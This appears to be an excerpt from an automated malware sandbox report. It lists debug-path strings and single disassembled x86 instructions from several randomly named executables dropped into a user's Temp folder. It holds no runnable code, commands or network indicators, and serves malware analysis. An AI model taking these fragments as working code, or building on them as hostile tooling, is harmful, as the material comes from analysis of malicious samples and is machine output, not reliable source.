Source:	Binary string: BitLockerToGo.pdbGCTL source: b7b5e2e140.exe, 0000000D.00000002.3109758340.000000000A6D0000.00000004.00001000.00020000.00000000.sdmp, 14b550e5e3.exe, 0000001B.00000003.3145250358.000000000E084000.00000004.00001000.00020000.00000000.sdmp, 6761aae677.exe, 0000001E.00000002.3396257355.000000000EC84000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.PDBX source: xkV9ZML.exe, 00000007.00000002.2746126312.00000000009B3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\omtnkdoj\bnwv\yogisfk\cqf.pdbs source: 976cb97ff6.exe, 00000018.00000003.2922018748.000000000482F000.00000004.00001000.00020000.00000000.sdmp, 976cb97ff6.exe, 00000018.00000002.2947993314.0000000000410000.00000040.00000001.01000000.00000012.sdmp
Source:	Binary string: System.pdb source: WERCB41.tmp.dmp.21.dr
Source:	Binary string: Battery.pdb source: 4dfe6dfd76.exe, 0000000E.00000000.2749975380.0000000000952000.00000002.00000001.01000000.0000000F.sdmp, 4dfe6dfd76.exe, 0000000E.00000002.2792713729.0000000003E39000.00000004.00000800.00020000.00000000.sdmp, WERCB41.tmp.dmp.21.dr
Source:	Binary string: System.Windows.Forms.pdb source: WERCB41.tmp.dmp.21.dr
Source:	Binary string: Battery.pdbD source: WERCB41.tmp.dmp.21.dr
Source:	Binary string: vdr1.pdb source: Bjkm5hE.exe, 00000026.00000002.3401015940.0000000000401000.00000040.00000001.01000000.0000001F.sdmp
Source:	Binary string: mscorlib.pdb source: xkV9ZML.exe, 00000007.00000002.2746126312.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, WERCB41.tmp.dmp.21.dr
Source:	Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb/; source: 976cb97ff6.exe, 00000018.00000002.2948683307.0000000000A89000.00000004.00000020.00020000.00000000.sdmp, 976cb97ff6.exe, 00000018.00000002.2953926669.0000000007184000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WERCB41.tmp.dmp.21.dr
Source:	Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb/; source: 976cb97ff6.exe, 00000018.00000002.2953926669.0000000007184000.00000004.00000020.00020000.00000000.sdmp, 976cb97ff6.exe, 00000018.00000002.2951247939.0000000005053000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: xkV9ZML.exe, 00000007.00000002.2746126312.00000000009B3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Administrator\Desktop\vdr1\Release\vdr1.pdb source: Bjkm5hE.exe, 00000026.00000002.3401015940.0000000000401000.00000040.00000001.01000000.0000001F.sdmp
Source:	Binary string: System.ni.pdb source: WERCB41.tmp.dmp.21.dr

Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+16h]	10_2_0040C820
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then cmp word ptr [edi+ebx], 0000h	10_2_00447970
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then mov edx, ecx	10_2_0040D1AF
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], esi	10_2_00447A70
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 2C331E1Fh	10_2_004462A5
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 2C331E1Fh	10_2_00446320
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then mov ecx, eax	10_2_00445C62
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-51465F03h]	10_2_0042D560
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edx+5BDCC20Bh]	10_2_0042D560
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], C8B478E8h	10_2_0042D560
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+06h]	10_2_0042D560
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edx+00000220h]	10_2_004115F9
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+2Ch]	10_2_00433F95
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then mov byte ptr [edi], cl	10_2_00433F95
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then jmp eax	10_2_0042B061
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-000000E5h]	10_2_0042B020
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then mov byte ptr [ebx], cl	10_2_0043502D
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	10_2_004328E0
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then mov word ptr [ecx], dx	10_2_0043008E
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then mov byte ptr [edx], bl	10_2_004340B4
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then mov word ptr [eax], cx	10_2_00426160
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then mov word ptr [eax], dx	10_2_00426160
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then mov byte ptr [edi], bl	10_2_0040C100
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then cmp al, 5Ch	10_2_00402100
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+00000130h]	10_2_0041C10A
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-0BCF5F66h]	10_2_0041C10A
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ebp]	10_2_00448110
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then lea edx, dword ptr [eax+7Dh]	10_2_00447110
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then mov word ptr [esi], cx	10_2_004129C4
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then mov eax, dword ptr [edi+0Ch]	10_2_004019E0
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	10_2_004311E0
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then mov dword ptr [esp+08h], eax	10_2_0043524C
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then mov byte ptr [edi], cl	10_2_0043524C
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then mov word ptr [eax], cx	10_2_0040E25C
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-4A7FB4A0h]	10_2_0042DA60
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then lea edx, dword ptr [eax+7Dh]	10_2_00447210
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	10_2_0040A2C0
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	10_2_0040A2C0
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then movzx edi, byte ptr [edx]	10_2_0041CAC9
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	10_2_004192D0
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	10_2_0043DAD0
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then lea edx, dword ptr [eax+7Dh]	10_2_004472A0
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then mov ecx, eax	10_2_004202B0
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ebx-34DB8AC2h]	10_2_004332B0
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	10_2_00427340
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+2Ch]	10_2_00434319
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then mov byte ptr [edi], cl	10_2_00434319
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+2Ch]	10_2_0043432F
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then mov byte ptr [edi], cl	10_2_0043432F
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then mov dword ptr [esp+0Ch], ecx	10_2_00420B2F
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then lea edx, dword ptr [eax+7Dh]	10_2_00447330
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then mov edi, ebp	10_2_00405336
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2C331E1Fh	10_2_0042CBB0
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2C331E1Fh	10_2_0041EC70
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-000000E5h]	10_2_0042AC10
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 2C1F0655h	10_2_00444420
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then movzx ecx, byte ptr [edx+edi]	10_2_00444420
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	10_2_00432430
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then movzx edx, byte ptr [ebx+eax-75h]	10_2_0042FCB0
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+0Ch]	10_2_00412D6E
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2C331E1Fh	10_2_00412D6E
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+0Ch]	10_2_00412D6E
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then mov eax, ebx	10_2_00422570
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2C331E1Fh	10_2_00419DD6
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 089E115Eh	10_2_00447E40
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then movzx ebp, word ptr [ecx]	10_2_00447E40
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then mov ebx, edx	10_2_0040BE50
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then mov byte ptr [edi], al	10_2_00433E1B
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then mov byte ptr [edi], al	10_2_00433E1D
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then lea edx, dword ptr [eax+7Dh]	10_2_00447630
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then cmp word ptr [esi+eax+02h], 0000h	10_2_00420EC7
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then mov edx, ecx	10_2_004456F4
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+0Ch]	10_2_00412EA1
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2C331E1Fh	10_2_00412EA1
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-000000E5h]	10_2_0042AEA0
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then jmp ecx	10_2_0040D70F
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], C6BF57D2h	10_2_00443FE0
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then mov esi, ecx	10_2_00432FE5
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then mov byte ptr [edi], cl	10_2_00432FE5
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edx+222F1B84h]	10_2_00441FEE
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+60A39CB4h]	10_2_00441FEE
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then mov edi, eax	10_2_004027F0
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then cmp word ptr [esi+eax], 0000h	10_2_0042F7F1
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then movzx ebx, bx	10_2_0042AFF4
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then add ecx, esi	10_2_0042AFF4
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edx+0000026Ch]	10_2_004357BA
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then push esi	19_2_00442050
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then mov edx, ecx	19_2_00410B14
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then mov byte ptr [edi], cl	19_2_00433570
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then mov eax, esi	19_2_0040EEDE
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then mov esi, eax	19_2_00433F09
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then mov byte ptr [esi], cl	19_2_0041F803
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then mov ecx, eax	19_2_00433805
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then mov byte ptr [edi], cl	19_2_00433805
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	19_2_00430020
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then mov ecx, ebx	19_2_00407830
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then mov dword ptr [ebp+00h], 00000022h	19_2_004300C0
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edx+04h]	19_2_004468C0
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ebx+0000025Fh]	19_2_004198DF
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then mov ecx, eax	19_2_0040C900
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then mov ecx, eax	19_2_0042C910
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then mov dword ptr [esp+0Ch], eax	19_2_0042C930
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then mov ebp, eax	19_2_004089F0
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx]	19_2_004461A0
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	19_2_0040A260
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	19_2_0040A260
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2C331E1Fh	19_2_0041AA07
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then mov edx, ecx	19_2_0041AA07
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then mov edx, ecx	19_2_0041AA07
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then mov dword ptr [esp], eax	19_2_0041AA07
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then mov ecx, eax	19_2_00426210
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then mov esi, eax	19_2_00426210
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then mov byte ptr [edi], bl	19_2_0040C220
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	19_2_0041BA2A
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx+esi]	19_2_0040B2C0
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+14h]	19_2_0042F2C0
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then mov word ptr [eax], cx	19_2_004202A8
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then mov edx, ecx	19_2_00420B57
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then mov word ptr [ecx], bp	19_2_00420B57
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then mov word ptr [esi], ax	19_2_00420B57
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then mov edx, ecx	19_2_0043335D
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then mov edx, ecx	19_2_00420B6E
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then mov word ptr [ecx], bp	19_2_00420B6E
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then mov word ptr [esi], ax	19_2_00420B6E
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then jmp eax	19_2_0040DB7B
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then movzx edi, byte ptr [esi+edx-54AE03E6h]	19_2_0040E320
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], FD7B050Ah	19_2_00411B24
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then mov edx, eax	19_2_00440334
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then mov edx, ecx	19_2_00443B30
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then jmp eax	19_2_0040DB81
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	19_2_0041C475
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then movzx ebx, bx	19_2_0042B494
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	19_2_00431540
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	19_2_0043BD70
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	19_2_00418510
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then mov word ptr [ebp+00h], cx	19_2_004185D0
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 3183FE40h	19_2_004185D0
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-000000B9h]	19_2_004185D0
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-000000B9h]	19_2_004185D0
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+2C5CD9C2h]	19_2_00443DDD
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2C331E1Fh	19_2_0041D670
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-49h]	19_2_0041D670
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then mov edx, ecx	19_2_00443632
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+7B7A28AEh]	19_2_004196D1
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then mov word ptr [eax], cx	19_2_004206B0
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+06h]	19_2_004206B0
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx]	19_2_00422F40
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+38h]	19_2_00442740
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then movzx edx, byte ptr [ebp+ecx-5062AC8Eh]	19_2_0041FF62
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then mov byte ptr [esi], cl	19_2_0041F719
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+0Ah]	19_2_0040F733
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then push esi	19_2_0041C7D2
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then cmp word ptr [edi+eax], 0000h	19_2_00424FE0
Source: C:\Users\user\AppData\Local\Temp\1077993001\4dfe6dfd76.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-7E0BBB3Dh]	19_2_0042EFAA
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then mov dword ptr [ebp+00h], 00000022h	23_2_008500C0
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edx+04h]	23_2_008668C0
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ebx+0000025Fh]	23_2_008398DF
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then mov byte ptr [esi], cl	23_2_0083F803
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then mov ecx, eax	23_2_00853805
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then mov byte ptr [edi], cl	23_2_00853805
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	23_2_00850020
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then mov ecx, ebx	23_2_00827830
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then push esi	23_2_00862050
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx]	23_2_008661A0
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then mov ebp, eax	23_2_008289F0
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then mov ecx, eax	23_2_0082C900
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then mov ecx, eax	23_2_0084C910
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then mov dword ptr [esp+0Ch], eax	23_2_0084C930
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then mov word ptr [eax], cx	23_2_008402A8
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx+esi]	23_2_0082B2C0
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+14h]	23_2_0084F2C0
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2C331E1Fh	23_2_0083AA07
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then mov edx, ecx	23_2_0083AA07
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then mov edx, ecx	23_2_0083AA07
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then mov dword ptr [esp], eax	23_2_0083AA07
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then mov ecx, eax	23_2_00846210
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then mov esi, eax	23_2_00846210
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then mov byte ptr [edi], bl	23_2_0082C220
Source: C:\Users\user\AppData\Local\Temp\1077995001\d755f09e83.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	23_2_0083BA2A
